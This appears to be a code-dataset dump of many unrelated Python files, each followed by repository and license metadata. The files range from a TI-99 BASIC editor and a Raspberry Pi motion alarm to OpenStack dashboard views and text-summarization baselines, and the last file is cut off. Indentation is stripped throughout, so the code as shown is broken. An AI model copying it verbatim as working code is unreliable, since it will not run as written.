basicSuffixes = ('.b99', '.bas', '.xb')
tipi_disk_base = '/home/tipi/tipi_disk'
def load(file_name):
edit_file_path = tipi_disk_base + '/' + file_name
file_contents = basicContents(edit_file_path)
# If it isn't a BASIC PROGRAM IMAGE, then try plain file
if not file_contents:
if file_name.lower().endswith(basicSuffixes):
with open(edit_file_path, "rb") as fh:
file_contents = fh.read()
editor_data = { 'file_contents': file_contents,
'file_name': file_name,
'status_message': '' }
return editor_data
def new(file_name):
editor_data = { 'file_contents': '',
'file_name': file_name,
'status_message': '' }
return editor_data
def save(file_name, data):
logger.debug("save %s", file_name)
edit_file_path = tipi_disk_base + '/' + file_name
logger.debug("edit_file_path %s", edit_file_path)
if file_name.lower().endswith(basicSuffixes):
logger.debug("saving ascii basic file")
with open(edit_file_path, "wb") as fh:
fh.write(data)
else:
logger.debug("saving program image basic file")
writeBasicContents(edit_file_path, data)
editor_data = { 'file_contents': data,
'file_name': file_name,
'status_message': '' }
return editor_data
def basicContents(filename):
logger.debug("fetching BASIC PROGRAM as ascii in %s", filename)
# We are assuming the test for FIAD isTiFile has already passed.
prg_tmp_file = '/tmp/' + str(uuid.uuid4()) + '.tmp'
bas_tmp_file = '/tmp/' + str(uuid.uuid4()) + '.tmp'
try:
# strip the FIAD header off to get the raw file xbas99 needs.
with open(filename, "rb") as tifile:
with open(prg_tmp_file, "wb") as program:
bytes = bytearray(tifile.read())
if not ti_files.isProgram(bytes):
return False
program.write(bytes[128:])
call(['/home/tipi/xdt99/xbas99.py', '-d', prg_tmp_file, '-o', bas_tmp_file])
if ti_files.isTiBasicAscii(bas_tmp_file):
with open(bas_tmp_file, 'rb') as content_file:
return content_file.read().decode("latin_1")
finally:
if os.path.exists(prg_tmp_file):
os.unlink(prg_tmp_file)
if os.path.exists(bas_tmp_file):
os.unlink(bas_tmp_file)
return False
def writeBasicContents(edit_file_name, file_contents):
bas_tmp_file = '/tmp/' + str(uuid.uuid4()) + '.tmp'
prg_tmp_file = '/tmp/' + str(uuid.uuid4()) + '.tmp'
try:
with open(bas_tmp_file, 'wb') as file:
file.write(file_contents.encode("latin_1"))
# Encode ASCII file to TI's binary BASIC format:
#
call(['xbas99.py', '-c', bas_tmp_file, '-o', prg_tmp_file])
# Now convert to TIFILES format:
#
call(['xdm99.py', '-T', prg_tmp_file, '-o', edit_file_name])
finally:
if os.path.exists(prg_tmp_file):
os.unlink(prg_tmp_file)
if os.path.exists(bas_tmp_file):
os.unlink(bas_tmp_file)
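# Round-trip sketch (illustrative): save() turns ASCII BASIC into a TIFILES
# PROGRAM image via xbas99/xdm99, and load() reverses it via basicContents():
#   save('HELLO', '10 PRINT "HI"')
#   load('HELLO')['file_contents']   # ~ the same BASIC listing again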
|
gpl-3.0
| -5,738,017,850,617,338,000
| 30.163636
| 85
| 0.573221
| false
| 3.357493
| false
| false
| false
|
galaxy-modal/transcriptomics
|
galaxy-tools/stderr_wrapper.py
|
1
|
1676
|
#!/usr/bin/python
"""
Wrapper that executes a program with its arguments but reports standard error
messages only if the program exit status was not 0. This is useful to prevent
Galaxy from interpreting that there was an error if something was printed on
stderr, e.g. if this was simply a warning.
Example: ./stderr_wrapper.py myprog arg1 -f arg2
Author: Florent Angly
"""
import sys, subprocess
assert sys.version_info[:2] >= ( 2, 4 )
def stop_err( msg ):
sys.stderr.write( "%s\n" % msg )
sys.exit()
def __main__():
# Get command-line arguments
args = sys.argv
# Remove name of calling program, i.e. ./stderr_wrapper.py
args.pop(0)
# If there are no arguments left, we're done
if len(args) == 0:
return
    # If one needs to silence stdout: note that appending ">" and "/dev/null"
    # would not redirect anything with shell=False (they would reach the
    # program as literal arguments), so these stay disabled.
    #args.append( ">" )
    #args.append( "/dev/null" )
#cmdline = " ".join(args)
#print cmdline
try:
# Run program
proc = subprocess.Popen( args=args, shell=False, stderr=subprocess.PIPE )
returncode = proc.wait()
# Capture stderr, allowing for case where it's very large
stderr = ''
buffsize = 1048576
try:
while True:
stderr += proc.stderr.read( buffsize )
if not stderr or len( stderr ) % buffsize != 0:
break
except OverflowError:
pass
        # Program failed: raise the captured stderr as the error message
if returncode != 0:
raise Exception, stderr
except Exception, e:
# Running Grinder failed: write error message to stderr
stop_err( 'Error: ' + str( e ) )
if __name__ == "__main__": __main__()
|
gpl-2.0
| -7,320,840,070,516,737,000
| 28.403509
| 81
| 0.601432
| false
| 3.897674
| false
| false
| false
|
inkvisit/sarmacoins
|
contrib/seeds/makeseeds.py
|
1
|
3522
|
#!/usr/bin/env python
#
# Generate seeds.txt from Pieter's DNS seeder
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 200000
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = set([
"127.0.0.1"
])
import re
import sys
import dns.resolver
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):9887$")  # change the port here
PATTERN_AGENT = re.compile(r"^(\/Satoshi:0.8.6\/|\/Satoshi:0.9.(2|3)\/|\/Core:0.1(0|1|2).\d{1,2}.\d{1,2}\/)$")
def parseline(line):
sline = line.split()
if len(sline) < 11:
return None
# Match only IPv4
m = PATTERN_IPV4.match(sline[0])
if m is None:
return None
# Do IPv4 sanity check
ip = 0
for i in range(0,4):
if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
return None
ip = ip + (int(m.group(i+2)) << (8*(3-i)))
if ip == 0:
return None
    # Skip bad results (note: split() yields strings, so compare to "0").
    if sline[1] == "0":
return None
# Extract uptime %.
uptime30 = float(sline[7][:-1])
# Extract Unix timestamp of last success.
lastsuccess = int(sline[2])
# Extract protocol version.
version = int(sline[10])
# Extract user agent.
agent = sline[11][1:-1]
# Extract service flags.
service = int(sline[9], 16)
# Extract blocks.
blocks = int(sline[8])
# Construct result.
return {
'ip': m.group(1),
'ipnum': ip,
'uptime': uptime30,
'lastsuccess': lastsuccess,
'version': version,
'agent': agent,
'service': service,
'blocks': blocks,
}
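# Column layout of a seeder line, as inferred from parseline() above:
#   0 "ip:port"    2 last-success timestamp    7 30-day uptime, e.g. "100.00%"
#   8 block height    9 service flags (hex)    10 protocol version    11 "/agent/"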
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
result = []
asn_count = {}
for ip in ips:
if len(result) == max_total:
break
try:
asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
if asn not in asn_count:
asn_count[asn] = 0
if asn_count[asn] == max_per_asn:
continue
asn_count[asn] += 1
result.append(ip)
except:
sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
return result
def main():
lines = sys.stdin.readlines()
ips = [parseline(line) for line in lines]
    # Skip entries without a valid IPv4 address.
ips = [ip for ip in ips if ip is not None]
# Skip entries from suspicious hosts.
ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
# Enforce minimal number of blocks.
ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
# Require service bit 1.
ips = [ip for ip in ips if (ip['service'] & 1) == 1]
# Require at least 50% 30-day uptime.
ips = [ip for ip in ips if ip['uptime'] > 50]
# Require a known and recent user agent.
ips = [ip for ip in ips if PATTERN_AGENT.match(ip['agent'])]
# Sort by availability (and use last success as tie breaker)
ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
# Look up ASNs and limit results, both per ASN and globally.
ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
# Sort the results by IP address (for deterministic output).
ips.sort(key=lambda x: (x['ipnum']))
for ip in ips:
print ip['ip']
if __name__ == '__main__':
main()
|
mit
| -8,680,919,261,118,517,000
| 29.495652
| 186
| 0.572569
| false
| 3.070928
| false
| false
| false
|
camptocamp/QGIS
|
python/plugins/processing/outputs/OutputExtent.py
|
1
|
1632
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
OutputNumber.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from processing.outputs.Output import Output
class OutputExtent(Output):
def __init__(self, name="", description=""):
self.name = name
self.description = description
self.value = None
self.hidden = True
    def setValue(self, value):
        try:
            if value is not None and isinstance(value, basestring):
                self.value = value.strip()
            else:
                self.value = ",".join([str(v) for v in value])
            return True
        except:
            return False
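# Example of the intended behaviour (illustrative):
#   out = OutputExtent("extent", "Bounding box")
#   out.setValue([0, 0, 10, 10])    # stores "0,0,10,10"
#   out.setValue(" 0,0,10,10 ")     # stores the stripped string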
|
gpl-2.0
| 8,318,590,386,951,244,000
| 36.090909
| 75
| 0.424632
| false
| 5.164557
| false
| false
| false
|
ujikit/Raspberry
|
Pir_Sensor.py
|
1
|
1093
|
#!/usr/bin/python
import RPi.GPIO as GPIO
import time
import os
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(27,GPIO.OUT)
GPIO_PIR = 7
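# Wiring assumed by this script (inferred from the code): the PIR output
# feeds BCM pin 7, and BCM pin 27 pulses an indicator (LED/relay) on motion.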
print "PIR Module Test (CTRL-C to exit)"
# Set pin as input
GPIO.setup(GPIO_PIR,GPIO.IN) # Echo
Current_State = 0
Previous_State = 0
try:
print "Waiting for PIR to settle ..."
# Loop until PIR output is 0
while GPIO.input(GPIO_PIR)==1:
Current_State = 0
print " Ready"
# Loop until users quits with CTRL-C
while True :
# Read PIR state
Current_State = GPIO.input(GPIO_PIR)
if Current_State==1 and Previous_State==0:
GPIO.output(27,GPIO.HIGH)
time.sleep(0.5)
GPIO.output(27,GPIO.LOW)
Previous_State=1
      # play the alarm sound in the background via mpg321
      os.system('mpg321 /home/alarm.mp3 &')
elif Current_State==0 and Previous_State==1:
# PIR has returned to ready state
print " Ready"
Previous_State=0
# Wait for 10 milliseconds
time.sleep(0.01)
except KeyboardInterrupt:
print " Quit"
# Reset GPIO settings
GPIO.cleanup()
|
gpl-3.0
| -486,704,074,232,634,300
| 21.770833
| 48
| 0.650503
| false
| 2.954054
| false
| false
| false
|
canarie/openstack-dashboard
|
django-openstack/src/django_openstack/nova/views/instances.py
|
1
|
9293
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing Nova instances.
"""
from django import http
from django import template
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.shortcuts import redirect, render_to_response
from django.utils.translation import ugettext as _
from django_openstack import log as logging
from django_openstack.nova import exceptions
from django_openstack.nova import forms as nova_forms
from django_openstack.nova import shortcuts
from django_openstack.nova.exceptions import handle_nova_error
import boto.ec2.ec2object
LOG = logging.getLogger('django_openstack.nova')
@login_required
@handle_nova_error
def index(request, project_id):
project = shortcuts.get_project_or_404(request, project_id)
instances = sorted(project.get_instances(),
key=lambda k: k.public_dns_name)
return render_to_response('django_openstack/nova/instances/index.html', {
'region': project.region,
'project': project,
'instances': instances,
'detail': False,
}, context_instance=template.RequestContext(request))
@login_required
@handle_nova_error
def detail(request, project_id, instance_id):
project = shortcuts.get_project_or_404(request, project_id)
instance = project.get_instance(instance_id)
instances = sorted(project.get_instances(),
key=lambda k: k.public_dns_name)
if not instance:
raise http.Http404()
return render_to_response('django_openstack/nova/instances/index.html', {
'region': project.region,
'project': project,
'selected_instance': instance,
'instances': instances,
'update_form': nova_forms.UpdateInstanceForm(instance),
'enable_vnc': settings.ENABLE_VNC,
'detail': True,
}, context_instance=template.RequestContext(request))
@login_required
@handle_nova_error
def performance(request, project_id, instance_id):
project = shortcuts.get_project_or_404(request, project_id)
instance = project.get_instance(instance_id)
if not instance:
raise http.Http404()
return render_to_response(
'django_openstack/nova/instances/performance.html',
{'region': project.region,
'project': project,
'instance': instance,
'update_form': nova_forms.UpdateInstanceForm(instance)},
context_instance=template.RequestContext(request))
# TODO(devcamcar): Wrap this in an @ajax decorator.
def refresh(request, project_id):
# TODO(devcamcar): This logic belongs in decorator.
if not request.user.is_authenticated():
return http.HttpResponseForbidden()
project = shortcuts.get_project_or_404(request, project_id)
instances = sorted(project.get_instances(),
key=lambda k: k.public_dns_name)
return render_to_response(
'django_openstack/nova/instances/_instances_list.html',
{'project': project,
'instances': instances},
context_instance=template.RequestContext(request))
@handle_nova_error
def refresh_detail(request, project_id, instance_id):
# TODO(devcamcar): This logic belongs in decorator.
if not request.user.is_authenticated():
return http.HttpResponseForbidden()
project = shortcuts.get_project_or_404(request, project_id)
instance = project.get_instance(instance_id)
instances = sorted(project.get_instances(),
key=lambda k: k.public_dns_name)
return render_to_response(
'django_openstack/nova/instances/_instances_list.html',
{'project': project,
'selected_instance': instance,
'instances': instances},
context_instance=template.RequestContext(request))
@login_required
@handle_nova_error
def terminate(request, project_id):
project = shortcuts.get_project_or_404(request, project_id)
if request.method == 'POST':
instance_id = request.POST['instance_id']
try:
project.terminate_instance(instance_id)
except exceptions.NovaApiError, e:
messages.error(request,
_('Unable to terminate %(inst)s: %(msg)s') %
{'inst': instance_id, 'msg': e.message})
LOG.error('Unable to terminate instance "%s" on project "%s".'
' Exception:"%s"' % (instance_id, project_id, e.message))
except exceptions.NovaUnauthorizedError, e:
messages.error(request, 'Permission Denied')
LOG.error('User "%s" denied permission to terminate instance'
' "%s" on project "%s"' %
(str(request.user), instance_id, project_id))
else:
messages.success(request,
_('Instance %(inst)s has been terminated.') %
{'inst': instance_id})
LOG.info('Instance "%s" terminated on project "%s"' %
(instance_id, project_id))
return redirect('nova_instances', project_id)
@login_required
@handle_nova_error
def console(request, project_id, instance_id):
project = shortcuts.get_project_or_404(request, project_id)
conn = project.get_openstack_connection()
console = conn.get_console_output(instance_id)
response = http.HttpResponse(mimetype='text/plain')
response.write(console.output)
response.flush()
return response
@login_required
@handle_nova_error
def vnc(request, project_id, instance_id):
project = shortcuts.get_project_or_404(request, project_id)
conn = project.get_openstack_connection()
params = {'InstanceId': instance_id}
vnc = conn.get_object('GetVncConsole',
params,
boto.ec2.ec2object.EC2Object)
return http.HttpResponseRedirect(vnc.url)
@login_required
@handle_nova_error
def graph(request, project_id, instance_id, graph_name):
project = shortcuts.get_project_or_404(request, project_id)
graph = project.get_instance_graph(instance_id, graph_name)
if graph is None:
raise http.Http404()
response = http.HttpResponse(mimetype='image/png')
response.write(graph)
return response
@login_required
@handle_nova_error
def update(request, project_id, instance_id):
project = shortcuts.get_project_or_404(request, project_id)
instance = project.get_instance(instance_id)
if not instance:
raise http.Http404()
if request.method == 'POST':
form = nova_forms.UpdateInstanceForm(instance, request.POST)
if form.is_valid():
try:
project.update_instance(instance_id, form.cleaned_data)
except exceptions.NovaApiError, e:
messages.error(request,
_('Unable to update instance %(inst)s: %(msg)s') %
{'inst': instance_id, 'msg': e.message})
LOG.error('Unable to update instance "%s" on project "%s".'
' Exception message: "%s"' %
(instance_id, project_id, e.message))
except exceptions.NovaUnauthorizedError, e:
messages.error(request, 'Permission Denied')
LOG.error('User "%s" denied permission to update instance'
' "%s" on project "%s"' %
(str(request.user), instance_id, project_id))
else:
messages.success(request,
_('Instance %(inst)s has been updated.') %
{'inst': instance_id})
LOG.info('Instance "%s" updated on project "%s"' %
(instance_id, project_id))
return redirect('nova_instances', project_id)
else:
return render_to_response(
'django_openstack/nova/instances/edit.html',
{'region': project.region,
'project': project,
'instance': instance,
'update_form': form},
context_instance=template.RequestContext(request))
else:
return render_to_response(
'django_openstack/nova/instances/edit.html',
{'region': project.region,
'project': project,
'instance': instance,
'update_form': nova_forms.UpdateInstanceForm(instance)},
context_instance=template.RequestContext(request))
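# Routing note (added for context): these views are resolved by name in the
# package's URL configuration -- e.g. the redirect() calls above assume a
# pattern registered as 'nova_instances' that takes a project_id.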
|
apache-2.0
| 2,217,813,549,633,417,500
| 35.731225
| 79
| 0.633488
| false
| 4.174753
| false
| false
| false
|
HXLStandard/hxl-proxy
|
hxl_proxy/recipes.py
|
1
|
5398
|
""" Manage a data-transformation recipe
Started April 2019 by David Megginson
License: Public Domain
"""
import flask, hxl_proxy, hxl_proxy.dao, hxl_proxy.filters, logging, werkzeug
class Recipe:
""" Class to hold a HXL Proxy recipe.
The recipe can come either from the request parameters, or from a saved recipe
in the database. For a saved recipe, it's still possible to override
certain properties (especially the URL) with the request parameters, so that
you can use the same recipe with multiple source URLs (disabled for private
datasets with authentication tokens).
"""
RECIPE_OVERRIDES = ['url', 'schema_url', 'stub']
""" Properties that may be overridden in a saved recipe """
def __init__(self, recipe_id=None, auth=False, request_args=None):
""" Recipe constructor
@param recipe_id: the hash identifier of an existing saved recipe
@param auth: if true, the user needs to authenticate to use the recipe
@param request_args: custom args to substitute for the current Flask request
"""
# initialise the properties
self.recipe_id = str(recipe_id) if recipe_id is not None else None
self.args = None
self.name = None
self.description = None
self.cloneable = True
self.passhash = None
self.stub = None
self.overridden = False
self.auth = auth
# default to the request GET parameters
if request_args is None:
request_args = flask.request.args
# do we have a saved recipe? if so, then populate from the saved data
if recipe_id is not None:
# read the recipe from the database
saved_recipe = hxl_proxy.dao.recipes.read(self.recipe_id)
if not saved_recipe:
raise werkzeug.exceptions.NotFound("No saved recipe for {}".format(recipe_id))
# populate the class from the saved recipe dict
self.fromDict(saved_recipe)
# check if this page requires authorisation
if auth and not self.check_auth():
raise werkzeug.exceptions.Unauthorized("Wrong or missing password.")
# allow overrides *only* if we're not using a private dataset
# (not sending an HTTP Authorization: header)
if "authorization_token" not in self.args:
for key in self.RECIPE_OVERRIDES:
if key in request_args:
self.overridden = True
self.args[key] = request_args[key]
# we don't have a saved recipe: use the HTTP GET parameters
else:
self.args = request_args
self.stub = request_args.get("stub")
@property
def url(self):
return self.args.get("url")
@property
def schema_url(self):
return self.args.get("schema_url")
def fromDict(self, props):
""" Deserialise this object from a dict """
self.recipe_id = props.get("recipe_id")
self.name = props.get("name")
self.description = props.get("description")
self.cloneable = props.get("cloneable")
self.passhash = props.get("passhash")
self.stub = props.get("stub")
self.date_created = props.get('date_created')
self.date_modified = props.get('date_modified')
self.args = dict(props.get("args"))
def toDict(self):
""" Serialise this object to a dict """
return {
"recipe_id": self.recipe_id,
"name": self.name,
"description": self.description,
"cloneable": self.cloneable,
"passhash": self.passhash,
"stub": self.stub,
"args": self.args,
}
def logs(self, level="WARNING"):
handler = Recipe.LogHandler(level)
logging.getLogger('hxl').addHandler(handler)
logging.getLogger('hxl_proxy').addHandler(handler)
source = hxl_proxy.filters.setup_filters(self)
        try:
            # iterate the dataset purely for its side effects: any warnings
            # or errors raised by the filters are captured by the handler
            for row in source:
                pass
        except:
            pass
return handler.messages
def check_auth(self, password=None):
""" Check whether a users is authorised to access this page.
@param password: a cleartext password
@returns: True if the user is authorised.
"""
# does this recipe require a password?
if self.passhash:
# do we have a clear-text password?
if password:
session_passhash = hxl_proxy.util.make_md5(password)
flask.session['passhash'] = session_passhash
# no password, so look in the session token
else:
session_passhash = flask.session.get('passhash')
# do the password hashes match?
if self.passhash == session_passhash:
return True
else:
flask.session['passhash'] = None
flask.flash("Wrong password")
return False
# no password required, so always OK
else:
return True
class LogHandler(logging.Handler):
def __init__(self, level):
super().__init__(level)
self.messages = []
def handle(self, record):
self.messages.append(record)
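# Minimal usage sketch (the URL is a made-up example value): a Recipe can
# be built from a plain dict of request args, without a saved recipe and
# without a live Flask request context:
#
#     recipe = Recipe(request_args={"url": "http://example.org/data.csv"})
#     recipe.url       # -> "http://example.org/data.csv"
#     recipe.toDict()  # serialisable form, e.g. for saving via hxl_proxy.dao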
|
unlicense
| 7,937,438,209,383,225,000
| 32.116564
| 94
| 0.585031
| false
| 4.439145
| false
| false
| false
|
prataprc/tayra
|
tayra/test/stdttl/ref/html5.ttl.py
|
1
|
2138
|
import imp
from io import StringIO
from pluggdapps.plugin import Plugin, implements
from tayra import BaseTTLPlugin
def __traceback_decorator__( frames ):
from copy import deepcopy
from os.path import basename
def _map2ttl( frame ):
filename = frame.filename
lineno = frame.lineno
lines = open(filename).readlines()[:lineno]
lines.reverse()
rc = {}
for l in lines :
if l.strip().startswith('# lineno') :
_, ttl_lineno = l.split(':', 1)
ttl_lineno = int( ttl_lineno )
ttl_text = open( _ttlfile ).readlines()[ ttl_lineno-1 ]
return ttl_lineno, ttl_text
return None, None
newframes = []
for frame in frames :
newframes.append( frame )
frameadded = getattr( frame, '_ttlframeadded', False )
basen = basename( frame.filename )
if basen.endswith( '.ttl.py' ) and basen == (basename( _ttlfile ) + '.py') and frameadded == False :
newframe = deepcopy( frame )
frame._ttlframeadded = True
try :
newframe.lineno, newframe.linetext = _map2ttl( newframe )
if newframe.lineno :
newframe.filename = _ttlfile
newframes.append( newframe )
except :
raise
continue
return newframes
def body( *args, **kwargs ) :
_m.pushbuf()
# lineno:1
_m.pushbuf()
_m.extend( ['<a "http://pluggdapps.com">'] )
_m.pushbuf()
# lineno:1
_m.extend( [' pluggdapps-link', '\n'] )
_m.handletag( _m.popbuftext(), _m.popbuftext(), **{'nl': '', 'oprune': False, 'indent': False, 'iprune': False} )
# lineno:2
_m.pushbuf()
_m.extend( ['<abbr "World Health Organisation">'] )
_m.pushbuf()
# lineno:2
_m.extend( [' WHO', '\n'] )
_m.handletag( _m.popbuftext(), _m.popbuftext(), **{'nl': '', 'oprune': False, 'indent': False, 'iprune': False} )
return _m.popbuftext()
# ---- Global Functions
# ---- Interface functions
# ---- Footer
|
gpl-3.0
| -2,734,730,127,233,263,000
| 31.393939
| 134
| 0.53508
| false
| 3.718261
| false
| false
| false
|
kandluis/document_summaries
|
summarizer/baselines.py
|
1
|
2617
|
'''
Main entry point for our text summarization using our baseline algorithm.
The baseline algorithm consists of assigning a weight to each sentence.
We define the weight of a sentence using simple heuristics: its position
in the document (geometric priors) or the frequencies of the words it
contains (see the functions below).
Copyright, 2015.
Authors:
Luis Perez (luis.perez.live@gmail.com)
Kevin Eskici (keskici@college.harvard.edu)
'''
from . import utils
import numpy as np
def geom(p, k):
    # probability mass of the geometric distribution: P(X = k) = (1-p)^k * p
    return (1.0 - p)**k * p
def concatDocs(D):
sents = []
for doc in D:
sents += doc
return sents
def baseline(D, k):
'''
Baseline simply takes the first k sentences in the documents.
'''
D = concatDocs(D)
mapping = {i:i for i in xrange(len(D))}
return range(k), D, mapping
def geomPriorBaseline(D, k, p=0.02):
D = concatDocs(D)
sentences, mapping = utils.cleanDocument(D)
probs = np.array([geom(p, i) for i in xrange(len(sentences))])
probs = probs / sum(probs)
summary = np.random.choice(xrange(len(sentences)), size=k,
replace=False, p=probs)
return summary, D, mapping
def modifiedGeomPriorBaseline(D, k, p=0.02):
D = concatDocs(D)
sentences, mapping = utils.cleanDocument(D)
probs = np.array([geom(p, i) for i in xrange(1, len(sentences))])
probs = probs / sum(probs)
summary = np.random.choice(xrange(1, len(sentences)), size=k,
replace=False, p=probs)
summary = np.append(0, summary)
return summary, D, mapping
def multipleGeomPrior(D, k, p=0.02):
probs = []
for doc in D:
sentences, _ = utils.cleanDocument(doc)
docProbs = np.array([geom(p, i) for i in xrange(len(sentences))])
docProbs = docProbs / sum(docProbs)
probs += list(docProbs)
probs = np.array(probs)/sum(probs)
D = concatDocs(D)
sentences, mapping = utils.cleanDocument(D)
summary = np.random.choice(xrange(len(sentences)), size=k,
replace=False, p=probs)
return summary, D, mapping
def wordFreqBaseline(D, k):
D = concatDocs(D)
sentences, mapping = utils.cleanDocument(D)
freqs = utils.MyCounter()
for sentence in sentences:
for word in sentence:
freqs[word] += 1.0
summary = []
summary_words = set()
while len(summary) < min(k, len(D)):
sent_scores = [sum([freqs[word] for word in sentence
if word not in summary_words]) / len(sentence) for sentence in sentences]
selected = sent_scores.index(max(sent_scores))
summary.append(selected)
summary_words = summary_words.union(sentences[selected])
return summary, D, mapping
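# Minimal sketch of the calling convention (toy, made-up documents):
# D is a list of documents, each a list of sentences, and baseline()
# simply selects the first k sentences:
#
#     docs = [['First sentence.', 'Second sentence.'], ['Third sentence.']]
#     summary, flat, mapping = baseline(docs, 2)
#     summary  # -> [0, 1]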
|
apache-2.0
| 8,077,415,874,106,459,000
| 28.077778
| 101
| 0.621704
| false
| 3.434383
| false
| false
| false
|
arunkgupta/gramps
|
gramps/gen/filters/rules/person/_iswitness.py
|
1
|
2398
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2002-2006 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ....ggettext import gettext as _
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from .. import Rule
from ....lib.eventroletype import EventRoleType
from ....lib.eventtype import EventType
#-------------------------------------------------------------------------
# "Witnesses"
#-------------------------------------------------------------------------
class IsWitness(Rule):
"""Witnesses"""
labels = [_('Event type:')]
name = _('Witnesses')
description = _("Matches people who are witnesses in any event")
category = _('Event filters')
def apply(self,db,person):
for event_ref in person.event_ref_list:
if event_ref and event_ref.role == EventRoleType.WITNESS:
# This is the witness.
# If event type was given, then check it.
if self.list[0]:
event = db.get_event_from_handle(event_ref.ref)
specified_type = EventType()
specified_type.set_from_xml_str(self.list[0])
if event.type == specified_type:
return True
else:
# event type was not specified, we're returning a match
return True
return False
|
gpl-2.0
| 2,207,472,141,097,469,400
| 36.46875
| 75
| 0.51543
| false
| 4.805611
| false
| false
| false
|
doriancoins/doriancoin
|
contrib/devtools/check-rpc-mappings.py
|
1
|
5971
|
#!/usr/bin/env python3
# Copyright (c) 2017 The Doriancoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Check RPC argument consistency."""
from collections import defaultdict
import os
import re
import sys
# Source files (relative to root) to scan for dispatch tables
SOURCES = [
"src/rpc/server.cpp",
"src/rpc/blockchain.cpp",
"src/rpc/mining.cpp",
"src/rpc/misc.cpp",
"src/rpc/net.cpp",
"src/rpc/rawtransaction.cpp",
"src/wallet/rpcwallet.cpp",
]
# Source file (relative to root) containing conversion mapping
SOURCE_CLIENT = 'src/rpc/client.cpp'
# Argument names that should be ignored in consistency checks
IGNORE_DUMMY_ARGS = {'dummy', 'arg0', 'arg1', 'arg2', 'arg3', 'arg4', 'arg5', 'arg6', 'arg7', 'arg8', 'arg9'}
class RPCCommand:
def __init__(self, name, args):
self.name = name
self.args = args
class RPCArgument:
def __init__(self, names, idx):
self.names = names
self.idx = idx
self.convert = False
def parse_string(s):
assert s[0] == '"'
assert s[-1] == '"'
return s[1:-1]
def process_commands(fname):
"""Find and parse dispatch table in implementation file `fname`."""
cmds = []
in_rpcs = False
with open(fname, "r") as f:
for line in f:
line = line.rstrip()
if not in_rpcs:
if re.match("static const CRPCCommand .*\[\] =", line):
in_rpcs = True
else:
if line.startswith('};'):
in_rpcs = False
elif '{' in line and '"' in line:
m = re.search('{ *("[^"]*"), *("[^"]*"), *&([^,]*), *{([^}]*)} *},', line)
assert m, 'No match to table expression: %s' % line
name = parse_string(m.group(2))
args_str = m.group(4).strip()
if args_str:
args = [RPCArgument(parse_string(x.strip()).split('|'), idx) for idx, x in enumerate(args_str.split(','))]
else:
args = []
cmds.append(RPCCommand(name, args))
assert not in_rpcs and cmds, "Something went wrong with parsing the C++ file: update the regexps"
return cmds
def process_mapping(fname):
"""Find and parse conversion table in implementation file `fname`."""
cmds = []
in_rpcs = False
with open(fname, "r") as f:
for line in f:
line = line.rstrip()
if not in_rpcs:
if line == 'static const CRPCConvertParam vRPCConvertParams[] =':
in_rpcs = True
else:
if line.startswith('};'):
in_rpcs = False
elif '{' in line and '"' in line:
m = re.search('{ *("[^"]*"), *([0-9]+) *, *("[^"]*") *},', line)
assert m, 'No match to table expression: %s' % line
name = parse_string(m.group(1))
idx = int(m.group(2))
argname = parse_string(m.group(3))
cmds.append((name, idx, argname))
assert not in_rpcs and cmds
return cmds
def main():
root = sys.argv[1]
# Get all commands from dispatch tables
cmds = []
for fname in SOURCES:
cmds += process_commands(os.path.join(root, fname))
cmds_by_name = {}
for cmd in cmds:
cmds_by_name[cmd.name] = cmd
# Get current convert mapping for client
client = SOURCE_CLIENT
mapping = set(process_mapping(os.path.join(root, client)))
print('* Checking consistency between dispatch tables and vRPCConvertParams')
# Check mapping consistency
errors = 0
for (cmdname, argidx, argname) in mapping:
try:
rargnames = cmds_by_name[cmdname].args[argidx].names
except IndexError:
